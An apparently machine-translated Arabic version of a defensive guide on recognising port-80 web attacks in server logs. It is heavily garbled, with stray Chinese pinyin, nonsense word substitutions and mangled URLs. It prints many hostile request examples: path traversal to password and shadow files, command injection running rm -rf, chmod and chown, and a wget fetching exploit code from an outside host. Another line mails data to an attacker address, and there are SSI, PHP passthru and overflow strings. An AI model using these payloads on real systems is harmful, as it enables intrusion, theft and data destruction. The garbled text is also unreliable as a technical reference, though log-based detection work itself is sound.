80 منفذا على شبكة الانترنت لخدمة اثار الهجوم

I. ملخص

ثانيا وصفا مفصلا ل

ثالثا. وعلاوة على ذلك

رابعا. تحليل انتشار الحرب

خامسا ترانسكودينغ

سادسا الخلاصة

[] نبذة مختصرة

موقع على شبكة الإنترنت 80 كافتراض منفذ خدمة ، على المشاكل الأمنية المختلفة يبقيه بعيدا عن الافراج عن بعض من هذه الثغرات الأمنية تسمح للمهاجمين حتى الحصول على إذن المسؤول عن النظام للدخول على الموقع نفسه ، وفيما يلي بعض المنفذ 80 التعقب Zenomorph من الهجمات البحوث ، واقول لكم كيف تجد مشاكل من سجلات السجل.

[التفاصيل]

هنا في جزء من خلال عدد من Liezi عرض على خادم الشبكة ، والتطبيقات على هجومهم عامة ، والتعقب ، والتي تمثل الهجوم الرئيسي الوحيد Liezi ، أنه لا توجد قائمة للجميع شكل من أشكال الهجوم ، فإن هذا القسم سوف وصف مفصل لدور كل هجوم ، وعلى كيفية استغلال هذه الثغرات الأمنية للهجوم.

(1) "." ".." وطلب "..."

آثار هذه الهجمات شائعة جدا لتطبيقات الويب وخادم الويب ، والتي كانت تسمح للمهاجمين أو دودة للفيروسات برنامج لتغيير مسار خادم الويب ، والوصول إلى المناطق المغلقة. معظم برامج المجموعة الاستشارية لاندونيسيا مع هذه العيوب ، ".." طلب.

على سبيل المثال :

http://host/cgi-bin/lame.cgi؟file=../../../../etc/motd

وهذا يدل على طلب المهاجم Liezi زارة التنمية الاجتماعية هذا الملف ، إذا كان المهاجم على شبكة الإنترنت قدرة اختراق خادم الدليل الجذر ، ثم الحصول على مزيد من المعلومات وللحصول على المزيد من الامتيازات.

(2) "20 ٪" طلب

20 ٪ هي قيمة عرافة أن المسافات 16 ، رغم أن هذا لا يعني أن تتمكن من استخدام أي شيء ، ولكن عند عرض السجل والحصول عليها ، وبعض التطبيقات التي تعمل على خادم الويب هذا الحرف يمكن أن تنفذ على نحو فعال ولذلك ، يجب النظر بعناية في السجل. من ناحية أخرى ، يمكن طلب مساعدة في بعض الأحيان لتنفيذ بعض الأوامر.

على سبيل المثال :

http://host/cgi-bin/lame.cgi؟page=ls ٪ | 20 القاعدة

هذا Liezi يظهر المهاجم لتنفيذ أمر يونكس ، قائمة الكتالوج كامل الوثائق المطلوبة ، مما تسبب في مهاجم الوصول إلى الملفات الهامة على النظام ، لمساعدته على تقديم مزيد من الشروط للحصول على الامتيازات.

(3) "٪ 00" طلب

كان 00 ٪ وقال الست عشرية 16 بايت فارغة ، وقادرة على خداع التطبيق على شبكة الإنترنت ، وطلب أنواع مختلفة من الملفات.

الأمثلة على ذلك :

http://host/cgi-bin/lame.cgi؟page=index.html

هذا قد يكون طلب صالحة في الجهاز ، إذا كان المهاجم على علم بهذا الطلب كانت ناجحة ، وقال انه بحث مزيد من الإجراءات المجموعة الاستشارية لاندونيسيا.

http://host/cgi-bin/lame.cgi؟page=../../../../etc/motd

ولعل برنامج المجموعة الاستشارية لاندونيسيا لا يقبل هذا الطلب لأنه طلب للتحقق من اسم الملف لاحقة ، مثل : أنواع html.shtml أو غيرها من الملفات. معظم البرامج سوف اقول لكم نوع الملف المطلوب غير صالح ، وهذه المرة سيقول طلبات مهاجم الملف يجب أن يكون طابع لاحقة نوع الملف ، لذلك يمكن للمهاجم الحصول على مسار النظام ، اسم الملف ، مما أدى إلى النظام لديك المزيد من المعلومات الحساسة

http://host/cgi-bin/lame.cgi؟page=../../../../etc/motd ٪ 00html

اهتمام لهذا الطلب ، فإنه خداع برنامج المجموعة الاستشارية لاندونيسيا أن هذه الوثيقة هو تحديد أنواع الملفات المقبولة ، بعض التطبيقات لعمليات التفتيش اعتبارا ملف طلب غبي ، والذي يستخدم عادة أساليب المهاجم.

(4) "|" طلب

هذا هو الطابع الأنابيب ، في نظام يونيكس ، طلبا للمساعدة في تنفيذ أوامر النظام عدة في الوقت نفسه.

على سبيل المثال :

# القط access_log | grep ط ".."

(هذا الأمر سيتم عرض السجل في الطلب "".. ، التي يشيع استخدامها في الهجمات والديدان وجدت)

غالبا ما تجد أن العديد من تطبيقات الويب استخدام هذا الحرف ، وهذا يؤدي أيضا إلى إنذارات كاذبة في سجلات الانمائية.

في دراسة متأنية من التطبيق الخاص بك ، وبالتالي فإن الاستفادة من الحد من الانذارات الكاذبة في أنظمة كشف التسلل.

هؤلاء بعض Lieh - تزو :

| http://host/cgi-bin/lame.cgi؟page=../../../../bin/ls

طلب هذا الأمر ، وفيما يلي بعض التغييرات في Liezi

http://host/cgi-bin/lame.cgi؟page=../../../../bin/ls ٪ 20 ٪ القاعدة | 20/etc

ويندرج هذا الطلب في نظام يونيكس / الخ دليل لجميع الملفات

٪ ٪ http://host/cgi-bin/lame.cgi؟page=cat 20access_log grep | 20 ٪ ط - 20 "عرجاء"

وسيكون تنفيذ الأمر طلب القط وتنفيذ الأوامر grep أيضا ، تحقق من عرجاء ""

(5) "،" طلب

في أنظمة يونيكس ، وهذا يسمح متعددة حرف سطر الأوامر التنفيذ

على سبيل المثال :

رقم # ؛ uname - 1

(تنفيذ الأمر الهوية ، متبوعا تنفيذ الأمر uname)

بعض البرامج على شبكة الانترنت مع هذه الشخصية ، قد يؤدي إلى هويات الخاص بتسجيل تحذيرا من الفشل ، يجب عليك التحقق بعناية برنامج الويب الخاص بك ، بحيث يمكنك الحد من مخاطر فشل التنبيهات الانمائية.

(6) " " و " " طلب

وينبغي التحقق من سجلات السجل الخاص حرفين ، هناك عدد من الأسباب ، الأول هو الحرف الذي اضاف البيانات في وثيقة

مثال 1 :

# صدى "الخاص hax0red h0 h0" / الخ / motd (motd طلب معلومات خطية في هذا المستند)

يمكن للمهاجم بسهولة استخدام طلب على النحو الوارد أعلاه العبث صفحة الويب الخاصة بك. وكثيرا ما تستخدم مثل هذه طلقة الشهير استغلال المهاجمين لتغيير صفحة ويب.

مثال 2 :

http://host/something.php=Hi 20mom ٪ ٪ ٪ 20Im 20Bold!

الخلط هو هتمل ستلاحظ أن لغة الإشارات هنا ، قضى أيضا " "،" "أحرف ، مثل هذه الهجمات لا يمكن أن يتسبب المهاجم من الوصول إلى النظام ، وأعتقد أن هذا الشعب هو موقع على شبكة الإنترنت المشروعة المعلومات (مما يؤدي إلى الناس زيارة هذا الرابط لزيارة مهاجم لتعيين عنوان ، قد يتم ترميز هذا الطلب إلى أحرف عرافة 16 في النموذج ، بحيث اثار الهجوم ليست واضحة جدا)

(7) "!" طلب

لغة مشتركة على هذه الشخصية س طلب (الخادم تضمين جانبية) أنا الهجوم ، إذا كان المهاجم هو المهاجم ارباك المستخدم بالنقر فوق تعيين الارتباط ، ونفس النحو الوارد أعلاه.

على سبيل المثال :

http://host1/something.php =

إلى Lieh تزو هو المهاجم يمكن أن تفعله هو أن ملف على موقع من host2 host1 يظهر أعلاه (وبطبيعة الحال ، يتطلب الزوار لزيارة إعدادات الاتصال المهاجم ، ويمكن تحويل هذا الطلب إلى 16 عرافة الترميز قناع ، وليس من السهل العثور على)

وفي الوقت نفسه ، لا يمكن تنفيذ هذا النهج أيضا على شبكة الإنترنت موقع قيادة السلطة

على سبيل المثال :

http://host/something.php =

وLieh التي تديرها على النظام البعيد "معرف" الأمر ، أنه سيتم عرض هوية المستخدم موقع على شبكة الإنترنت ، وعادة ما يكون "لا أحد" أو "الشبكة العالمية"

هذا النموذج يسمح أيضا تضمين الملفات المخفية.

على سبيل المثال :

http://host/something.php =

ولن الملفات المخفية. تباسود يتم عرضها ، سوف اباتشي ترفض اقامة مثل هذه القواعد ل. منتصف الوقت استمارة الطلب ، وشعار مباحث أمن الدولة وتجاوز مثل هذه القيود ، ويؤدي إلى مشاكل أمنية

(8) "،" طلب

مثل هذه الهجمات كانت محاولة لادخال بعد تطبيق ويب إجراءات بي ، قد تسمح للأمر التنفيذ ، اعتمادا على إعدادات الخادم ، وعوامل أخرى في العمل (مثل تعيين فب إلى الوضع الآمن)

على سبيل المثال : = http://host/something.php passthru ("")؛؟ معرف

في بعض التطبيقات بى بسيطة ، قد يكون لموقع على شبكة الإنترنت على نظام حقوق المستخدم البعيد لتنفيذ الأمر المحلي

(9) "' "طلب

هذه الشخصية تستخدم في وقت لاحق لتنفيذ الأوامر في بيرل ، الأحرف في تطبيق ويب غير مستخدمة في كثير من الأحيان ، حتى إذا كنت ترى ذلك في السجل الخاص بك ، يجب أن نكون حذرين جدا

على سبيل المثال :

http://host/something.cgi = 'معرف'

وكتابة برنامج بيرل المجموعة الاستشارية لاندونيسيا في مسألة يؤدي إلى تنفيذ الأوامر معرف

[] وعلاوة على ذلك

المقطع التالي يناقش تنفيذ المزيد من الهجمات يمكن أن الأوامر ، جنبا إلى جنب مع الوثائق المطلوبة ، وإذا كان لديك تنفيذ الأمر بعيد عيب ، يجب أن تكون كيفية التحقق من الاكتشاف. هذا الجزء هو فقط لإعطائك فكرة جيدة ، ونقول النظام الخاص بك ما يحدث ، في محاولة للهجوم على المهاجمين آثار النظام الخاص بك ، ولكن لا قائمة كل من المهاجم لاستخدام الأوامر والطلبات.

"/ بن / ليرة سورية"

تطلب هذا الأمر المسار بالكامل ، في كثير من الويب 应用 程序 من أن هذه الثغرة الأمنية ، إذا قمت بتسجيل الدخول في العديد من الأماكن في Zhezhong الطلب ، فمن الممكن للقيادة Yuanchengzhixing حصانة كبيرة ، ولكن ليس يى دينغ ون جي تي ربما تكون أيضا انذار كاذب. وذكر مرة واحدة مرة أخرى ، تطبيق الويب المكتوبة (المجموعة الاستشارية لاندونيسيا ، آسيا والمحيط الهادئ ، فب... الخ) هو أساس الأمن

على سبيل المثال :

http://host/cgi-bin/bad.cgi؟doh=../../../../bin/ls ٪ | 20 القاعدة

http://host/cgi-bin/bad.cgi؟doh=ls 20 ٪ القاعدة ؛

"cmd.exe"

هذا هو ويندوز للقذيفة ، وإذا كان لأحد المهاجمين وصول وتشغيل هذا البرنامج النصي في إعدادات الخادم بموجب الشروط المسموح بها في جهاز ويندوز يمكن القيام بأي شيء ، والكثير من الديدان هو عن طريق المنفذ 80 والاتصالات على الجهاز البعيد

http://host/scripts/something.asp=../../WINNT/system32/cmd.exe؟dir+e :

"/ بن / معرف"

هذه هي الملفين الثنائية ومشكلاتها و/ بن / ليرة سورية ، مثل ، إذا قمت بتسجيل الدخول في العديد من الأماكن مثل هذا الطلب ، فمن الممكن لكبير بعد تنفيذ الأمر الضعف ، ولكن ليس بالضرورة مشكلة ربما تكون أيضا انذار كاذب.

وسوف تظهر أي جزء ينتمي إلى أي مستخدم ، ومجموعة

على سبيل المثال :

http://host/cgi-bin/bad.cgi؟doh=../../../../bin/id |

http://host/cgi-bin/bad.cgi؟doh=id ؛

"/ بن / جمهورية مقدونيا"

هذا الأمر لا يمكن حذف الملفات دون الاستخدام الصحيح وهذا خطير جدا

الأمثلة على ذلك :

20 * | http://host/cgi-bin/bad.cgi؟doh=../../../../bin/rm ٪ 20 ٪ الترددات اللاسلكية

http://host/cgi-bin/bad.cgi؟doh=rm ٪ 20 ٪ 20 * الترددات اللاسلكية ؛

"مجلد مشترك وtftp الأمر"

وغالبا ما تكون هذه الأوامر المهاجم قد كسب المزيد من الامتيازات لتحميل الملفات ، مجلد مشترك أمر تحت يونيكس ، يمكن أن تستخدم لتحميل خلفي ، tftp تحت يونيكس القيادة والإقليم الشمالي ، ويستخدم لتحميل الملف. انتشار بعض الديدان أنفسهم من خلال معهد الدراسات الإسماعيلية tftp لنسخ الفيروس إلى المضيفين الآخرين

الأمثلة على ذلك :

http://host/cgi-bin/bad.cgi؟doh=../../../../path/to-wget/wget ٪ 20http : / host2/Phantasmp.c / | http:// المضيف / المجموعة الاستشارية لاندونيسيا ، بن / bad.cgi؟ زارة الصحة = ٪ 20http مجلد مشترك : / / www.hwa-security.net/Phantasmp.c ؛

"كات" الأمر

يتم استخدام هذا الأمر لعرض محتويات الملف ، وتستخدم لقراءة المعلومات الهامة ، مثل ملفات التكوين ، وملفات كلمة السر ، والملفات والوثائق الائتمان يمكن ان يخطر لك

20/etc/motd أمثلة : ٪ http://host/cgi-bin/bad.cgi؟doh=../../../../bin/cat | http://host/cgi-bin/ 20/etc/motd bad.cgi؟ زارة الصحة القط = ٪ ؛

"صدى" للقيادة

هذا الأمر المستخدم لكتابة البيانات إلى ملف ، مثل "index.html"

الأمثلة على ذلك : http://host/cgi-bin/bad.cgi؟doh=../../../../bin/echo ٪ 20 "أف سي # الكيوي ٪ 20here 20was ٪" 20 ٪ | 200day.txt ٪ http://host/cgi-bin/bad.cgi؟doh=echo ٪ 20 "أف سي # الكيوي ٪ 20here 20was ٪" ٪ 20 200day.txt ٪ ؛

"فرع فلسطين" القيادة

يسرد عملية قيد التشغيل حاليا ، ونقول للمهاجم أن مضيف بعيد تشغيل البرنامج من أجل الحصول على فكرة عن القضايا الأمنية ، للحصول على مزيد من الأذونات

http://host/cgi-bin/bad أمثلة : http://host/cgi-bin/bad.cgi؟doh=../../../../bin/ps ٪ | 20 منتدى قلعة. المجموعة الاستشارية لاندونيسيا؟ زارة الصحة = 20 ٪ ملاحظة منتدى قلعة ؛

"اقتل وkillall الأمر"

أنظمة يونيكس لقتل هذه العملية ، يمكن للمهاجم استخدام هذا الأمر لإيقاف خدمات النظام والعمليات يمكن أن يمحو آثار أيضا المهاجم ، وبعض استغلال سوف تنتج الكثير من العمليات التابعة

الأمثلة على ذلك : 20-9 ٪ http://host/cgi-bin/bad.cgi؟doh=../bin/kill 200 ٪ | http://host/cgi-bin/bad.cgi؟doh=kill 20 ٪ -9 200 ٪ ؛

"Uname الأمر"

هذا الأمر يقول المهاجم اسم الجهاز البعيد ، لبعض الوقت ، من خلال هذا الموقع على شبكة الإنترنت من أجل معرفة أي مقدمي خدمات الإنترنت ، للمهاجمين الذين قد زار اليوم. Uname واحد في أن يطلب في العادة ، وسيتم تسجيل هذه في ملف السجل

الأمثلة على ذلك : 20 ٪ http://host/cgi-bin/bad.cgi؟doh=../../../../bin/uname لhttp://host/cgi-bin/bad |. المجموعة الاستشارية لاندونيسيا؟ وزارة الصحة 20 ٪ = uname - 1 ؛

"نسخة مجلس التعاون الخليجي ، بيرل ، بيثون ، الخ..." التجميع / تفسير الأمر

مهاجم من خلال مجلد مشترك أو tftp تنزيل استغلال ، واستخدام سم مكعب ، مترجم دول مجلس التعاون الخليجي لتجميع هذا الى برنامج قابل للتنفيذ ، وامتيازات وصول مزيد من

http://host/cgi-bin/bad أمثلة : http://host/cgi-bin/bad.cgi؟doh=../../../../bin/cc ٪ 20Phantasmp.c |. المجموعة الاستشارية لاندونيسيا؟ زارة الصحة ٪ = 20Phantasmp.c دول مجلس التعاون الخليجي ؛ / a.out ٪ 20 ٪ ع 2031337 ؛

إذا عرض في العثور على سجلات "الثعبان" بيرل "هذه التعليمات قد يكون المهاجم البعيد لتحميل بيرل النصي الثعبان ، وحاول الحصول على الامتيازات المحلية

"البريد" الأمر

المهاجمين وغالبا ما تستخدم هذا النظام الأمر ، وبعض الوثائق الهامة إلى صندوق البريد المهاجم الخاصة ، ولكن أيضا على استعداد إلى البريد الإلكتروني وتنفذ هجمات بالقنابل

أمثلة : ٪ 20 ٪ http://host/cgi-bin/bad.cgi؟doh=../../../../bin/mail 20attacker@fuckcnhonker.org

2.168.22.1 ؛

"Chown ، شمود ، chgrp ، chsh ، الخ..." وغيرها من الأوامر

نظم يونيكس من أجل السماح لهم لتغيير أذونات الملف

chown = يتيح تحديد مالك الملف شمود = يسمح لتعيين أذونات الملف chgrp = يسمح للمالك لتغيير أذونات المجموعة على الملفات chsh = سمح لتغيير قذيفة المستخدم

الأمثلة على ذلك : 20777 ٪ ٪ http://host/cgi-bin/bad.cgi؟doh=../../../../bin/chmod 20index.html | http://host/cgi-bin/ bad.cgi؟ زارة الصحة = ٪ 20777 ٪ شمود 20index.html ؛ http://host/cgi-bin/bad.cgi؟doh=../../../../bin/chown 20zeno ٪ 20 ٪ / الخ / master.passwd ٪ http://host/cgi-bin/bad.cgi؟doh=chsh | 20/bin/sh ؛ http://host/cgi-bin/bad.cgi؟doh=../. /.. /.. / بن ٪ chgrp / 20nobody ٪ 20/etc/shadow |

"/ الخ / passwd" الملف

هذا هو ملف للنظام المرور ، الظل عادة باتجاه آخر ، ولا تسمح لمعرفة كلمة السر المشفرة ، ولكن بالنسبة للمهاجمين الذين يمكن أن نعرف ما هو صالح للمستخدم ، ومسار النظام المطلق ، واسم موقع وغيرها من المعلومات ، كما هي عادة من جانب الظل وبذلك سوف نرى عادة المهاجم / الخ / الظل الملف

"/ الخ / master.passwd"

هذا الملف هو ملف كلمة السر نظام بي إس دي ، يحتوي على كلمة المرور المشفرة ، الملف على حساب الجذر هو فقط للقراءة فقط ، وبعض المهاجمين غير المهرة افتتح محاولته لقراءة محتويات الداخل. ، وإذا كان الموقع هو امتيازات الجذر لتشغيل ، ثم المهاجم هو ، يمكننا قراءة محتويات الداخل ، والكثير من المشاكل على المسؤول عن النظام سيأتي واحدا تلو الآخر

"/ الخ / الظل"

يحتوي على نظام تشفير كلمة المرور ، وقراءة نفسه على حساب الجذر ، و / وآخرون / master.passwd تقريبا

"/ الخ / motd"

عند تسجيل دخول المستخدمين إلى نظام يونيكس ، فإن المعلومات تظهر ، في رسالة "من اليوم" الملف ، فإنه يوفر معلومات هامة النظام والمسؤول عن مجموعة مستخدمي بعض ، للمستخدمين الذين يريدون أن يروا أولئك الذين ليسوا ، يحتوي أيضا على معلومات إصدار نظام ، المهاجم عادة ما نرى هذا الملف ، لفهم ما كان النظام يعمل على المهاجم ، فإن الخطوة التالية هي البحث عن هذا النوع من النظام ، واستغلال ، والوصول إلى المزيد من نظام الامتيازات

"/ الخ / تستضيف"

وتقدم الوثيقة عنوان بروتوكول الإنترنت وشبكة المعلومات ، يمكن للمهاجم معرفة المزيد حول إعدادات الشبكة للنظام

"/ البيرة / المحلية / اباتشى / أسيوط / httpd.conf"

هذا هو خادم الويب اباتشي ملف التكوين ، يمكن للمهاجم فهم ، مثل المجموعة الاستشارية لاندونيسيا ، وغيرها من مباحث أمن الدولة معلومات يمكن الوصول إليها

"/ الخ / inetd.conf"

هذا هو ملف التكوين خدمة رقباء ، يمكن للمهاجم تعلم الجهاز البعيد ، بدء تشغيل هذه الخدمات ، سواء لاستخدام المجمع للتحكم في الوصول ، إذا تم العثور على المجمع على التوالي ، للمهاجمين الخطوة التالية سوف تحقق "/ الخ hosts.allow /" و "/ الخ /" hosts.deny ، الملف ، والتي قد تغير بعض الإعدادات ، امتيازات الوصول

". تباسود. هتكس ، و. Htgroup"

عادة ما تستخدم هذه الملفات في موقع على شبكة الإنترنت مصادقة المستخدم ، للمهاجمين وعرض هذه الملفات ، والحصول على اسم المستخدم وكلمة المرور ، يتم تشفير الملف كلمة السر. تباسود ، وكسر عملية فك التشفير من خلال بعض بسيطة ، وتسمح للمهاجمين للوصول إلى موقع المناطق المحمية (عادة للمستخدم مع نفس اسم المستخدم وكلمة المرور ، يمكن للمهاجم حتى زيارة حساب آخر)

"access_log وerror_log"

هذه هي ملفات السجل اباتشي ملقم ، المهاجمين في كثير من الأحيان عرض هذه الملفات ، والنظر في تلك الطلبات يتم تسجيلها ، وتلك الطلبات الأخرى لأماكن مختلفة

عادة ، المهاجم سيتم تعديل هذه الملفات السجل ، مثل المعلومات الخاصة كلمته ، ومهاجم من خلال 80 منفذ من خلال النظام الخاص بك ونظام النسخ الاحتياطي أيضا لا يعمل ، لا يوجد برنامج آخر تسجيل تسجيل حالة النظام ، التي من شأنها أن كشف التسلل يصبح من الصعب جدا على العمل

"[محرك الأقراص حرف] : winntrepairsam._ أو [محرك الأقراص حرف] : winntrepairsam"

كلمة السر ويندوز الإقليم الشمالي نظام الملف ، إذا لم يكن الأمر بعيد للتطبيق ، وطلب المهاجمون عادة هذه الوثائق ، ثم "الكراك l0pht" من نوع كلمة السر تكسير أدوات للقضاء ، إذا كان المهاجم يحاول الهجوم الملف المسؤول كلمة المرور ، إذا ثم نجاح الجهاز البعيد سيكون المهاجم يحصل على السيطرة

[تجاوز تحليل]

في هذه المقالة وأنا لن أقول الكثير حول تجاوز هذا الموضوع ، وسوف نعطيه ما هي تلك الظواهر واثار كثيرا ما تعرضت لهجوم والجدير بالملاحظة التي تتسم بأهمية خاصة ، منطقة عازلة من قبل المهاجم وتحويل رمز من الصعب العثور على وسائل أخرى لتحقيق

هنا تكمن بسيطة تسى

على سبيل المثال : http://host/cgi-bin/helloworld؟type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA اا

هذا Liezi يظهر المهاجم بناء على طلب لارسال الكثير من حرف ، لاختبار البرنامج تجاوز سعة المخزن المؤقت ، لا يمكن تجاوز سعة المخزن المؤقت الحصول على تنفيذ أذونات الأمر المضيف البعيد ، إذا كان المالك لديه setuid وإجراءات لجذر ، من خلال تجاوز ، يمكن الحصول على النظام بأكمله ، إن لم يكن مثل برنامج setuid ، ثم تجاوز هو فقط عن طريق تشغيل المستخدم في موقع على شبكة الإنترنت في مجال حقوق

هنا لا أستطيع أن أقول كل الظروف ، ولكن يجب عليك ان لدينا الوقت لفحص ملف السجل الخاص بك ، إذا كان في ذلك اليوم وجدت فجأة أن العديد من الطلبات ، وبدلا من الطلب المعتاد معتدل ، ويظهر لك تشنغ تجاوز تعرضت لهجمات ، وبطبيعة الحال ، قد يكون أيضا دودة جديدة شبكة هجوم

[ترانسكودينغ]

جميع الهجمات المذكورة أعلاه الطلب ، مهاجم يعرف عادة الأنظمة الميكانيكية في كثير من الأحيان هويات طلب الاختيار ، وعادة المهاجم سيتم استخدام أداة تحويل البيانات لتحويل صيغة المحتوى المطلوب 16 فرقة ، مما أسفر عن هويات سيتم تجاهل هذه الطلبات ، ونحن مطلعون على الضعف المجموعة الاستشارية لاندونيسيا أداة المسح الضوئي التي هي جيدة Liezi الشارب. إذا عرض السجل من الوقت وجدت عددا كبيرا من الفرقة 16 وليس بعض الأحرف المشتركة ، ثم المهاجم قد يحاول استخدام بعض الطرق لمهاجمة النظام الخاص بك

وهناك طريقة سريعة وسجل ملف طلب تلك عرافة 16 ، بنسخه إلى المتصفح الخاص بك ، يمكن تحويلها إلى المستعرض لطلب الحق ، وعرض محتويات هذا الطلب ، إذا لم يكن الشجاعة لاتخاذ هذا الخطر ، وهو رجل بسيط أسكي ، يمكن أن توفر لك مع الرمز الصحيح.

[خاتمة]

يمكن أن يحدث هذا المقال لا يغطي كافة منافذ 80 للهجوم ، ولكن قد ورد ذكرها أكثر أكثر من الهجوم العام ، واقول لكم كيفية التحقق من ملفات السجل الخاص بك ، وكيفية إضافة مثل عدد من القواعد الاستراتيجية الانمائية ، والكتابة هدفها هو وينبغي أن تكون الشبكة المعنية مسؤول النظام حول ما فكرة جيدة في الوقت نفسه ، وآمل أن هذه المادة تساعد على مطوري الويب على شبكة الإنترنت برنامج لكتابة برامج أفضل

للملاحظة : إذا كان لديك أي تعليقات واقتراحات ، الرجاء إرسال بريد admin@cgisecurity.com البريد الإلكتروني.